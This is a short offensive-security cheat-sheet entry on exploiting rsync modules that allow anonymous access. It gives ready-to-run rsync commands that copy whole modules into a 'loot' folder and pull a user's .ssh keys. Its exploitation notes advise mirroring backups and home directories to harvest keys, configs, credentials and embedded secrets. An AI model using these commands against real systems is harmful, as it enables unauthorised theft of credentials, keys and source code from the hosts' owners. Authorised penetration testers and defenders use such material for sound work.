Modules configured without auth users are readable by anyone. A single rsync command pulls the entire module, so an anonymous backup or web-root module hands over its full contents, which commonly include credentials, source, and data.
# Copy an entire anonymous module locally
rsync -av rsync://<target>/backup/ ./loot/
# Pull a specific path
rsync -av rsync://<target>/home/user/.ssh/ ./keys/
Exploitation notes#
- Mirror the whole module first; backups and home directories hold keys, configs, and credentials.
- Even read-only access to a web-root module leaks source code and its embedded secrets.
- Preserve attributes (
-a) to keep timestamps and permissions that may matter for later analysis.